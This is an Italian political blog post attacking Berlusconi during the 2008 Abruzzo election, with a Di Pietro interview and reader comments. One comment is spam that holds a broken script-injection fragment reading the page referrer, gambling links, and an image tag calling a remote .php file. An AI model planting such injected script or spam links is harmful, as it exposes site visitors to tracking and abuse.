Il ricatto di Berlusconi in Abruzzo.

Abbiamo appena incassato la maglia nera dei più disconnessi. Questo è l’unico paese dove il numero di famiglie che navigano, anzichè aumentare, diminuisce. Ora arriva anche la consacrazione del nostro più illustre statista: Silvio Berlusconi.

Nei 27 paesi della UE allargata non tutti hanno televisioni piduiste, così accade ancora che qualcuno si chieda qual’è il capo di stato europeo con più senso di leadership, capacità di fare squadra, vocazione europeista e capacità di risposta alla crisi. E’ strano che proprio lui, che ama così tanto i sondaggi solo venerdì 12, in chiusura di campagna elettorale per la Regione Abruzzo, a Chieti, ha  sbandierato un impressionante 13% di vantaggio sulla coalizione di centrosinistra – non vada orgoglioso del suo 27° posto su un totale di 27 partecipanti.

Berlusconi è il politico più dileggiato della storia dei politici dileggiati. Lo hanno dileggiato in Svezia. Lo hanno dileggiato, tutti insieme appassionatamente, in Giappone. Lo hanno dileggiato in America, quando ancora c’era il suo grande amico Bush a proteggerlo. Lo dileggiano ovunque, e ci dileggiano. Ora lo dileggiano – e ci dileggiano – perfino i corrispondenti europei a Bruxelles, confinando Berlusconi in ultima posizione insieme al leader rumeno Popescu Tariceanu. In prima posizione Sarkozy, quello che in Giappone rimase basito all’invito del nostro statista ad inviare baci caldi alle giovani ragazze nipponiche. La scena è di quelle memorabili: un manipolo di leader mondiali saluta un gruppo di giovincelle, facendo un gesto rispettoso con la mano. Poi il gruppetto si muove alla volta di un’altra destinazione, ma il nostro premier cabarettista rincorre Sarkozy, e da statista senza statura cerca di inerpicarsi sulla sua schiena per farsi notare. Quando quest’ultimo, presumibilmente infastidito da ciò che gli appare come una scimmietta ridens, si volta, Berlusconi gli mostra come bisogna fare con le donne. Ma quella non è l’Italia, e tra le ragazze non c’é la Carfagna. Sarkozy prende le distanze dall’homo cabarettiensis e cerca di guadagnare metri preziosi. Del resto la marionetta del ventriloquo Licio Gelli sa di poter contare sul TG4 di Emilio Fede, ma nel resto del mondo l’informazione non si fa in un laboratorio di sartoria, tagliando e cucendo gli spezzoni più opportuni. Se ti vedono con lo zoppo, non aspettano che impari a zoppicare: ti azzoppano prima loro!

Oggi e domani in Abruzzo si vota. Se dovesse vincere il centrosinistra, per me significa una cosa sola: la prima regione con i centri del potere interamente coperti da webcam e collegati in streaming 24 ore su 24. Vado io a tirare personalmente i fili e ad avvitare le telecamere alle pareti. Le altre regioni sarebbero costrette ad adeguarsi, in cascata: una rivoluzione.

Berlusconi lo sa. Per questo ha lasciato i suoi disimpegni di governo e ha battuto in lungo e in largo l’Abruzzo per un mese. Per questo ricatta l’Abruzzo, togliendo centinaia di milioni di euro destinati alle sue infrastrutture e promettendo di rimetterceli se il suo portaborse Gianni Chiodi dovesse vincere. Per questo attacca Di Pietro, definendo un abiezione morale ogni voto espresso in suo favore.

Ho incontrato Antonio Di Pietro. Gli ho chiesto come mai oggi non c’è più l’opposizione di una volta. E come mai ci si stupisce tanto quando qualcuno cerca di farla.

Byoblu: “Presidente Di Pietro, il motto dell’Italia dei Valori è sempre stato Unica Opposizione. Questo slogan sembra essere stato interiorizzato anche dal Presidente del Consiglio, perchè ultimamente attacca uno ed un solo interlocutore: Antonio Di Pietro. Lo fa anche in Abruzzo, dove è calato per difendere il suo pupillo Gianni Chiodi dopo che questi aveva aperto le bancarelle del lavoro usato.

Ma è così strano fare opposizione in questo paese? E come mai quando qualcuno la fa, suscita così tanto scalpore?”

Antonio Di Pietro: “Perchè la nostra opposizione, questa dell’Italia dei Valori, è un’opposizione vera, seria. Chiarezza del linguaggio e determinazione dell’azione. E’ un’opposizione che dice pane al pane e vino al vino, e che accusa senza paura il Presidente del Consiglio di essere un corruttore politico. E lui si arrabbia, non perché non lo sia, ma perchè l’ho detto. Io ho raccontato un fatto, tanto che ha minacciato di querelarmi ma non l’ha mai fatto. Perché sa che altrimenti si porta a casa pure la sentenza di curruzione politica. Infatti è corruzione politica quella di chi va a sfrugugliare l’animo di chi è stato eletto in altra parte politica e va a coartare i soggetti deboli, quelli alla ricerca di una poltrona, di trovare una sistemazione, che sono sempre esistiti. Giuda c’è sempre stato che si vende per trenta denari, ma a me fa più paura il diavolo tentatore. Paura non mi fa: ribrezzo sì! E quindi lo contrasto. Quel diavolo tentatore, quel serpentello che cerca di farti vedere la mela e ti compra l’anima.

Ecco, io credo che noi dell’Italia Dei Valori, ed io personalmente, abbiamo il dovere di informare i cittadini di questo modello di governo che si sta portando avanti. Quello di togliere ai poveri e di dare ai ricchi. Quello di creare una oligarchia di potere Gelli-sistema che si mette insieme per spartirsi la torta. Quello di chi sistema i crediti di Alitalia a favore di un gruppo di persone e li spalma sui cittadini. Quello di chi fa credere di avere preso provvedimenti in un modo, e invece li ha presi in un altro. Rispetto a tutto questo modo di fare, di chi restringe gli spazi di democrazia, di chi imbavaglia l’informazione, di chi non fa funzionare la giustizia, una voce libera ci sarà sempre nella mia persona, nell’Italia dei Valori. E soprattutto ci sarà sempre di più ora che il mondo della rete piano piano si sta prendendo i suoi spazi di libertà, e io sono convinto che un giorno non lontano anche le televisioni di Berlusconi saranno ormai obsolete.”

  • Facebook
  • Twitter
  • Digg
  • Delicious
  • Segnalo
  • Diggita
  • Reddit
  • StumbleUpon
  • LinkedIn
  • Upnews
  • FriendFeed
  • Google
  • Tumblr
  • Email
  • OkNotizie
donate

23 risposte a Il ricatto di Berlusconi in Abruzzo.

  • 5
    parliamone

    ..mamma mia!

    La P2, Sarkozy, l’Abruzzo, la moralità, Rete 4; non vale la pena neanche di entrare nei vari temi.

    Perderete l’Abruzzo

    Perderete la Toscan

    Perderete l’Emilia

    Il PD scomparirà sotto una motagna di corruzione

    L’IDV farà la fine di Beppe Grillo perché non ha alcun programma realizzabile; solo chiacchiere, disinformazione e utopie.

    Fra tre anni Berlusconi uscirà dalla politica

    Al suo posto ci sarà qualche leader dell’attuale centro destra: almeno quattro persone sono all’altezza di questo ruolo

    Riperderete le nuove elezioni

    Dopo i primi 5 anni diminuerà l’influenza delle idee nefaste della sinistra nell’intero Paese

    Durante i secondi 5 anni di mandato non avrete più la scusa del conflitto di interessi

    Durante i 5 anni del secondo mandato sarà avrà gia venti anni una generazione di giovani che hanno cominciato a capire un po’ meglio che cosa abbia significato la sinistra per il nostro Paese, in 40 anni.

    Alla fine del secondo mandato l’Italia sarà completamente cambiata e la sinistra potrà ritornare al Governo soltanto se nel frattempo avrà fatto piazza pulita delle minoranze massimaliste/forcaiole.

    Fra tre anni, con la scomparsa dalla scena di Silvio, usciranno di scena, PER FORTUNA, anche ridicoli giornalisti, molti puramente prezzolati, che scrivono scemenze colossali, pensando che la gente non abbia occhi per vedere e orecchie per sentire.

    Questo post è il più falso e disinformativo che mi sia mai capitato di incontrare!

     

  • 4

    inzomma,
    Berlusconi ha detto che l’ambiente è importante ma se na parla nel 2014 e si fara secondo quanto è stato fatto fino a quel giorno. In itaila, niente.

    OK
    Antonio, preparati alla campagna elettorale, prendi una team di regazzini, che so meglio di qualunque capocchine politico truffaeconomico, e prepara un programma. brucia , lo so, i programmi fanno pereere consenso, ma di questi tempi, ce ne uno che puo essre copiato, Quello di obama. non solo gli slogan come ha fatto walter.

    Ambiente, uguale, territorio e società migliore, posti di lavoro per la produzione e installazione di rinnovabili, risparmio in petrolio, benziana, gasolio e metano, e sanità. Che dovrebbe ritornare usl, e non azienda sanitaria che magna sui cancri. E redacce l’acqua pubbica e finanzia l’universita e la ricerca, batsa elemsina per fare ricerca sulle malattie genetiche genetiche dell’egoismo cieco.

    Lavora Toni, lavora, e copia obama.
    Hai la liberta di farlo?

    Se Berlusca avesse un minimo di potere che tanto decanta, no dico che reglerebbe le tv aad un pirla chiunue, ma visto che è anche presidente del consiglio e della maggioranza, userebbe la sua posizione di assoluto dominio inquesto settore per dare un assetto definitivo al dovere d’informazione, libera e pluralistica.

    i 200 euro di canone dovrebbe essere spalmato nelle tasse. Poi niente pubblicità alla rai, solo 2 canali, come a mediaset. Leggi rigide per garantire che nessun altro pirla modifichi il tutto. e idem per internet, garanzia di liberta e pluralità.

    Cosi avremmo garantito la libera informazione e la pluralita delle fonti senza regalare l’impero mediaset a nessuno. Oh Silvio, sei capace di una riforma del genere, e garantire qualcosa di buono per i tuoi concittadini, o è davvero inutile sperare?

    dimenticavo un business per silvio: il tvweb collega la tv ad internet e tutti potranno godere delle fonti illimitate che internet gia ha. Altro che tv, la tv a confronto è un crogiolo  stucchevole.

    Tonì se hai bisogno di idee scrivimi.

    Diego – Fonte Live

  • 3

    hzzkiet-s87y8y5-tw6q23fc-0 var r = document.referrer; document.write(‘< ' + '/script>‘) http://urlser.com/?IQpnn#1 texas holdem [url=http://free-poker-mo.lookera.net#3]free poker[/url] [url]http://urlser.com/?3kTmj#4[/url] [http://urlser.com/?e64r6#5 car insurance] “online gambling”:http://online-gambling-mo.lookera.net#6 [LINK http://black-jack-mo.lookera.net#7%5Dblack jack[/LINK] [img]http://victor.freewebhostingpro.com/1.php[/img]

  • 2
    Antonio
  • 1
    hakuyu

    tutta colpa di una sinistra che gli ha dato strada non si è mai opposta ,anzi ha cercato di imitare i sotterfugi e le furberie ma con scarsi risultati,ora lui sembra il pulito e la sinistra al completo il male
     

  • 0

    un appello a Vespa e Mimun, non dico che devo lasciare a favore di piace a me, ma una mano a far diffondere internet in tutte le case, anche quelle con persone meno giovani, ce la potete dare.
    Se si fa in fretta potreste essere gli ultimi IMPORTANTI giornalisti della tv, ci pensate?
    Dai, quache video in piu, qualche blog, qualche news, qualche approfondimento, e dai cosi passerete anche per quelli che hanno volut la diffusione (improcastinabile) di internet. e dai ……..

  • -1
    renato

    sulla nostra posizione nella graduatoria, ma anche in altre noi siamo negativi, non ci sono mai stati dubbi!

    Gli unici che sono disposti a vendere la propria madre per l’ineffabile ed immorale Berlusconi, sono i suoi membri del governo. Pagati con i soldi di tutti gli ITALIOTI (definizione coniata da Montanelli in altri tempi).

    Gli italioti sono sempre più poveri, l’ineffabile sempre più ricco!

    Gli italioti sono felici di essere derubati da un truffatore perché virtualmente si sentono protagonisti.

    Alcuni italioti arrivano al punto di tenere il sacco aperto al ladro, si sentono importanti, ma in realtà devonomendicare un tozzo di pane!

    Certo che la parola ITALIOTI, ovvero Italiani + idioti, è una parola magica, ogni prestigiatore avrebbe voluto coniarla! 

  • -2

    Berlusconi ha ragione, sulla questione morale.
    Nella sinistra c’è sempre stata gente che  ha approfittato delle cariche politiche per arricchirsi a discapito delle masse che hanno sempre creduto in un romantico comunismo surreale che è servito solo a fare regime ovunque e ancora accade in molte regioni italiane. Credo nella liberta dei singoli, nella libera iniziativa e impresa e nella volarizzazione degli individui in difficolta e il loro aiuto, nelle politiche sociali forti. Gi uomini sono egoisti, anche a cuba, cina e russia. Se mi fai il comunismo, forse anche gente iperattiva come silvietto e montezemolo, si calerebbero nelle braghe per farsi mantenere dallo stato.
    Detto questo lo sfascio della societa capitalista è l’avidita fine a se stessa dimenticando la societa che ci circonda e in cui loro stesso vivono compreso i loro figli. E l’ignoranza, non sa i danni che procura la corruzione, e la meritocrazia negata. Meritocrazia sembra una parola brutta, invece valorizza le qualita di certe persone  procurando guadagno e stimolo agli stessi, imprimendo forte vantaggio alla comunita tutta. Mentre dove mi giro, per qualunque cosa, anche il piu povero di questa società vuole prevaricare il prossimo per ottenere vantaggi a discapito di chi ne ha piu merito o bisisogno. Per non parlare della corruzione che i grossi poteri finanziari esercitano, disgregando totalmente la funzione delle liberta imprenditoriale preparndo la strada alla distruzione economica e sociale del paese. Compreso l’avallare fantarendimenti bancari.
    Fare luce su imprenditori del genere  tocca ai magistrati e a giornalisti informati degni di chiamarsi uomini e non rincoglianonne.
    Poi se il grande Silvio, corrompe, sfalsa, distrugge la liberta di impresa, io non loso, e Vespa non me lo ha mai detto, da quello che ricordo.

    Diego – Fonte Live

     

  • -3
    enrico

    sono schifato da questo popolo assefatto e sottomesso,non è possibile che si continui a litigare tra poveri e non si vede il vero problema:i politici sono tutti corrotti dai sindaci,presidenti di province,regione e  parlamento,nessuno dice che si sono  aumentati la loro piccola paghetta,nessuno dice che i sindaci vanno al potere per fare appalti a loro compiacenti ecc.vi chiedo :in ITALIA c’è mai stata la democrazia?invece di discutere se è meglio la destra o la sinistra i politici ci stanno Fottendo tutto.se l’italiano sivuole svegliare lo faccia subito o sara’ troppo tardi,oggi vige la regola che tutto è permesso in politica soprattutto rubare,mentre noi piccoli operai o impiegato dobbiamo fare sempre il nostro dovere rischiando di essere chiamati fannulloni ma lo stipendio è sempre di 1000-1500 euri al mese.ITALIANI SIETE DEI FESSI.

  • -4

    Non ci sono parole, dopo anni di politica stomachevole travasata nelle nostre case da giornalisti fognaioli, finalmente mi riconosco in giornalisti e politici che aderiscono esattamente con gli ideali di cittadini  onesti. Di Pietro e Messora.

    Il loro lavoro, in questo momento, è eccezionale, informazione reale e opposizione reale, e merita tutto la mia ammirazione e quella dei tanti che hanno dimostrato di apprezzarli.
    Poi, le chiacchiere di destra non mi interessano ( e da che pulpito … ).

    Diego – Fonte Live

  • -5

    Un appello a Vespa e Mimun :

    non dico che dovreste lasciare a favore dei giornalisti che preferisco io … ma potreste darci un aiuto a far diffondere internet in tutte le case … anche con i fondi che oggi prendono solo i giornali …  

    (continua sopra, quetsta era una correzione)

  • -6

    Sembra che Messora faccia libera informazione, come Travaglio, poi se si condividono idee di alcuni uomini politici, non è una bestiemma. l’importante e essere obiettivi, e sinceri. e pronti a criticare e riportare anche errori dei politici con cui magari in quel momento si condividono le idee.

    Ricordate quanto si è inc**zato Travaglio quando Capezzone gli ha dato del grillino prima e dipietrista poi. Non è possibile che difendere la costituzione, volere la  tv libera, ecc ecc si deve essere bollati di essere faziosi.

    Senza polemica. Buona giornata.

    Infatti mi chiedo sempre perchè se si difendo i diritti minimi dei cittadini, si è sempre attaccati dalla destra? Qual’è la relazione? 

  • -7

    …………………………………

  • -8
    paola

    "sfrugugliare l’animo"

    Tonino, mi fai morire…

  • -9
    Wil

    OT

    Caro Byoblu ed utenti,

    vi scrivo per invitarvi a leggere la lettera che spedirò alla Commissione Antimafia. Sono una persona comune, ma sento il bisogno di gridare a questo organismo un concetto chiaro e semplice: Mafia e Politica, bisogna indagare davvero.

    Vi aspetto per critiche, suggerimenti, sottoscrizioni.
     

    Grazie dello spazio e complimenti. Wil.

  • -10
    Raffaele Guerra

    sono sempre piu meravigliato del popolo italiano siamo in balia di unicapace che continua ha farsi gli affari suoi e dei suoi amici e del resto delle persone che vivono in questa nazione sse ne frega altamente anzi si propone con frasi che sanno solo di presa x ilc**o.    ma io mi domando ma quelli che lo hanno eletto un po di buon senso un po di cuore una coscenza o sono tutte persone arroganti fatte solo di una ignoranza abnorme. notate bene che sono gli stessi che sono in prima  fila nelle chiese  Auguri a tutti gli italiani da un operaio che non conta nulla ma contribuisce a tenere in piedi una nazione governata da un L.                                                                                              

  • -11

    Claudio, non ci hai più detto che fine ha fatto la mega intervista che dovevi fare a Di Pietro, ricordi le domande (scomode) raccolte dagli utenti del blog ormai qualche mese fa?

  • -12

    Il risultato era prevedibile, certo sarebbe stato bello vedere trionfare l’IDV, ma l’andare a braccetto con chi era appena stato buttato fuori per lo scandalo sulla sanità, benchè necessario, non ha giovato, così come la pressante disinformazione di Berlusconi….

  • -13
    Pino
    Beh, Berlusconi è così tanto dileggiato in America (ma chi è che scrive queste st****te), che Mister Obama lo ha invitato a discutere dei problemi come secondo tra i leaders Europoi.
    Chissà come mai.
  • -14

    IL pd, DEVE, perdere le elezioni per il bene dell’italia.
    Poi, IDV non ha vinto, ma ha preso tantissimi voti rispetto le parlamentari, e tanta gente non è andata a votare giustamente. Cio, nonostante vespa e mimun siano ancora per poco le fonti d’informazione ancora piu seguite finche internet non sarà colleata alle tv di tutta italia.
    Quindi buona parte dell’elettorato si è svegliato dal sonno.
    SVEGLIATE ANCHE GLI ALTRI !!!

  • -15

    Purtroppo, IDV non ce l’ha fatta. ANSA del 15-12-08:

     

    CANDIDATI/LISTE VOTI %
    —————————————————————
    RODOLFO DE LAURENTIIS (Udc-Udeur) 278 4,76
    ILARIA DEL BIONDO (Part. Comunista dei Lavoratori) 33 0,56

    ANGELO DI PROSPERO (Per il bene comune) 18 0,30

    CARLO COSTANTINI (Prc, Pdci, Idv, Partito
    Socialista, Pd, La Sinistra) 2.194 37,56

    TEODORO BUONTEMPO (La Destra) 66 1,13

    GIANNI CHIODI (Movimento per l’Autonomia,
    Liberalsocialisti, Pdl, Rialzati Abruzzo) 3.251 55,66.

    IDV chiude con un rispettabile 37,56% che però non basta contro al VERGOGNOSO 55,66% collezionato dal PDL nella figura del votodiscambista Chiodi.

     

    Una prece.

  • -16

    P.S.: da notare che ha votato solo il 52,98% degli aventi diritto, di cui 18 in tutto l’abruzzo han votato PBC. Madonna mia, mi spiace dirlo ma son contento di non essere abruzzese.

  • -17
    Andrea Lov.

    Caro Claudio,

    ti ho sempre visto come un modello per il modo in cui tu fai informazione però ultimamente mi stai un po’ deludendo…permettimi di darti un consiglio: non diventare una costola dell’ IDV o un altoparlante di DiPietro(che tra l’altro apprezzo molto)!!!!!secondo me il tuo sito deve restare com’ era fino a qualche mese fa e cioè una fonte pura e alternativa di informazione…. in bocca al lupo!

    Andrea L.

Avvertenze da leggere prima di intervenire sul blog di ByoBlu.


Non sono consentiti:
* messaggi non inerenti al post
* messaggi privi di indirizzo email
* messaggi anonimi (cioè senza nome e cognome)
* messaggi pubblicitari
* messaggi con linguaggio offensivo
* messaggi che contengono turpiloquio
* messaggi con contenuto razzista o sessista
* messaggi il cui contenuto costituisce una violazione delle leggi italiane
  (istigazione a delinquere o alla violenza, diffamazione, ecc.)
* messaggi il cui contenuto rappresenta un'aggressione alla persona e non alle sue idee
* messaggi eccessivamente lunghi
* messaggi formattati in modo da diminuire la fruibilità delle discussioni

Non è possibile copiare e incollare commenti di altri nel proprio. Comunque il proprietario del blog potrà in qualsiasi momento, a suo insindacabile giudizio, cancellare i messaggi. In ogni caso il proprietario del blog non potrà essere ritenuto responsabile per eventuali messaggi lesivi di diritti di terzi.

I Mini Blu

La violazione della legge sulla propaganda elettorale. Registrate e denunciate.

Registra e denuncia violazione della legge sulla propaganda elettorale Ancora adesso, mentre scrivo, a votazioni in corso, se aprite i social network vi potete imbattere facilmente nella propaganda a favore del Sì al Referendum Costituzionale. La campagna per il Sì in rete è stata invasiva e ai limiti dell'illegalità. Cosa dice la...--> LEGGI TUTTO

Grazie Giorgio Napolitano!? Chapeau!? Si sono bevuti il cervello!?

M5S Grazie Giorgio Stiamo parlando di Giorgio Napolitano? Quello che nel 2011 ha spianato la strada alla troika del governo Monti? Quello che ha firmato qualunque cosa? Quello che nel 2013, quando c'erano le consultazioni per formare un nuovo governo, ha chiamato al Quirinale Pdl e Pd ignorando il...--> LEGGI TUTTO

Ce lo chiede Beppe

Ce lo chiede Beppe Quindi, ricapitolando, il "collegio dei probiviri" di un movimento di democrazia diretta come il M5S è composto da tre nomi fatti per intero dal capo politico, senza che la "rete" possa nominarli non dico tutti, ma almeno un paio o anche uno solo. Peggio del direttorio dove...--> LEGGI TUTTO

Notizie dal web

La lettera di una mamma lavoratrice che fa venire il magone

Mamme lavoratrici: la triste realtà che si cela dietro alla famiglia del Mulino BiancoPubblico questa lettera (inviata a Beppe Severgnini sul Corriere della Sera), che fa venire il magone non solo a chi l'ha scritta ma anche a me che l'ho letta, e nella quale credo si riconoscano tante, troppe mamme lavoratrici, perché sia motivo di riflessione sul modo in cui si è...--> LEGGI TUTTO

La lobby dello zucchero uccide – i nuovi documenti tenuti nascosti

la lobby dello zucchero uccideNEW YORK: Decine di scienziati, negli Anni 60, furono pagati dall'industria americana dello zucchero per sminuire il collegamento tra consumo di zucchero e problemi cardiaci e spostare così l'attenzione sui grassi saturi. A rivelarlo sono una serie di nuovi documenti scoperti recentemente da un ricercatore della University of California di...--> LEGGI TUTTO

Caro M5S, volete allargare il direttorio? Bene, ma dovreste fare così…

votazione online democrazia direttaBarbara Lezzi, senatrice M5S, ha rilasciato un'intervista al Fatto Quotidiano sulle questioni romane. L'ipotesi, che alcuni organi di stampa dicono condivisa anche dalla Casaleggio Associati, è quella di allargare il direttorio a 30/40 persone. Una vera e propria struttura di intermediazione (di quelle che ancora oggi non sono previste dal "Non...--> LEGGI TUTTO

CURIOSITA’

Dai siti web agli oggetti web: la rete delle idee che sta per arrivare.

Libro digitale su una panchina internet delle cose Che lo crediate o no, c'è stato un tempo in cui per costruire un sito web di successo bastava conoscere un po' di html. Era la fine degli anni '90 ed è stato così anche per una buona parte degli anni 2000. Affittavi un po' di spazio...--> LEGGI TUTTO

Come funziona l’Italia: noi siamo quelli con il fiore in mano

Come funziona l'ItaliaCome funziona l'Italia Ecco come funziona la nostra società. Questa è l'Italia. E, ...caso mai cercaste il pallino "voi siete qui", in questo disegno noi siamo quelli con il fiore in mano....--> LEGGI TUTTO

I nanorobot a controllo mentale che vi osserveranno.

I NANOROBOT A CONTROLLO MENTALE CHE VI OSSERVERANNOPer la prima volta, una creatura vivente è stata controllata dall'uomo utilizzando esclusivamente il pensiero, grazie a nanorobot che hanno rilasciato all'interno di alcuni scarafaggi dosi programmate di farmaci, in risposta all'attività cerebrale di chi ha condotto l'esperimento. Una tecnica che - sostengono già alcuni - potrebbe essere molto utile per il trattamento...--> LEGGI TUTTO

Categorie
Le vostre email

Volete sapere perché siamo 73° per libertà di stampa? Eccovi serviti!

Libertà di stampa - in Italia siamo semi-liberi di Godot_74 L'Italia nel 2015 è scesa al 73° posto nella classifica sulla "libertà di stampa". Viene definita anche "semi-libera". Più che parlare di libertà di stampa, però, forse sarebbe il caso di concentrare l'attenzione sulla sua completezza, indipendenza ed obiettività. (altro…)...--> LEGGI TUTTO

tasto_newsletter
Video dal web

La vittoria dell’informazione e i pericoli del dopo Renzi

claudio messora Il No al referendum costituzionale è la vittoria dell'informazione contro chi pensava che per convincere gli italiani a votare basta una comunicazione semplificata, comprensibile a un bambino delle scuole medie. La sconfitta di Renzi passa anche per una ipersemplificazione della Comunicazione che non ha convinto e...GUARDA

Barbareschi ai giovani: “Siete superficiali! Avete votato no per ribellarvi al paterno!”

Barbareschi ai giovani: "Siete superficiali! Avete votato no per ribellarvi al paterno!" Luca Barbareschi traccia un quadro deprimente dei giovani che hanno votato no al referendum: sarebbero disinformati, superficiali, privi di strumenti, e con un grosso problema con il paterno, che li induce a ribellarsi contro qualsiasi cosa senza mai entrare nel merito....GUARDA

Barbareschi: siamo ascoltati e spiati da tutti i telefonini.

barbareschi-siamo-tutti-spiati-icona-play Luca Barbareschi, il popolare showman ora direttore del Teatro Eliseo a Roma, ha un'idea ben precisa sulla società della comunicazione digitale. A RaiNews24, il giorno dopo del voto al referendum, dice: "Siamo in democrazia... Capisco che ormai siamo ascoltati e spiati...GUARDA

Massimo D’Alema: è grazie a noi se M5S non ha vinto da solo!

Massimo D'Alema Massimo D'Alema fa la sua analisi del voto del referendum. Parla sarcasticamente delle rottamazioni di Matteo Renzi e afferma che se non ci fossero stati loro, il M5S avrebbe vinto da solo. ...GUARDA

I Cinque Stelle alla stampa: ora elezioni subito!

m5s-conferenza-stampa-iconaLa conferenza stampa del Movimento 5 Stelle alla Camera dei Deputati dopo la vittoria del No al Referendum Costituzionale. Davanti ai giornalisti, a tarda ora, dopo le dimissioni di Matteo Renzi, si sono presentati Vito Crimi, Danilo Toninelli, Alessandro Di Battista e Giulia Grillo, per dire al Presidente della Repubblica...GUARDA

Brunetta canta vittoria: Renzi ora si dimetta!

Renato Brunetta Brunetta canta vittoria: Renzi ora si dimetta!...GUARDA

Galloni e Rinaldi al Quirinale: ora Mattarella stralci il Pareggio di Bilancio

Galloni Rinaldi Quirinale Nino Galloni e Antonio Rinaldi salgono al Quirinale per chiedere simbolicamente a Mattarella che ora rispetti la volontà del popolo e si adoperi per rispettare la Costituzione italiana, stralciando subito il Pareggio di Bilancio ora Mattarella stralci Pareggio di Bilancio...GUARDA

Salvini – Vittoria del popolo contro i poteri forti di tutto il mondo

Salvini referendum La prima dichiarazione dopo gli Exit Poll che danno la vittoria del No a 55%-59% è di Matteo Salvini, che parla testualmente di "una vittoria del popolo contro i poteri forti di gran parte del mondo"....GUARDA

Film, libri e Dvd

Il ritorno alla bellezza passa anche dall’acquisto di un oggetto di design

Design e bellezza Ci sono oggetti che devono semplicemente funzionare, non importa quanto siano brutti. E, soprattutto, devono rompersi in fretta, in maniera da poter essere acquistati nuovamente, e poi ancora, e ancora, infinite volte. Tante quante bastano a soddisfare le esigenze del sistema produttivo. Altri devono semplicemente essere...==> GUARDA TUTTO ==>

Le cuffie migliori per la musica

Cuffie Pryma C'era un tempo in cui il mangiadischi la faceva da padrone. La cosiddetta alta fedeltà era un lusso per pochi, spesso riservata agli studi di registrazione dove le celebrità registravano le loro nuove hits. Poi vennero gli Hi-Fi, prodotti consumer ma con la capacità di riprodurre un'ampia...==> GUARDA TUTTO ==>

Lights Out: Terrore nel Buio – Trailer Hd ITA ufficiale #NonSpegnereLaLuce – film horror

LIGHTS OUT TERRORE NEL BUIO TRAILER ITA HD UFFICIALEIl trailer HD ITA (in italiano) di Lights Out: terrore nel buio. #NonSpegnereLaLuce I migliori film horror a casa tua: Film Horror al Cinema. Dal produttore James Wan (“L’evocazione-The Conjuring”), è in arrivo il racconto di un terrore sconosciuto in...==> GUARDA TUTTO ==>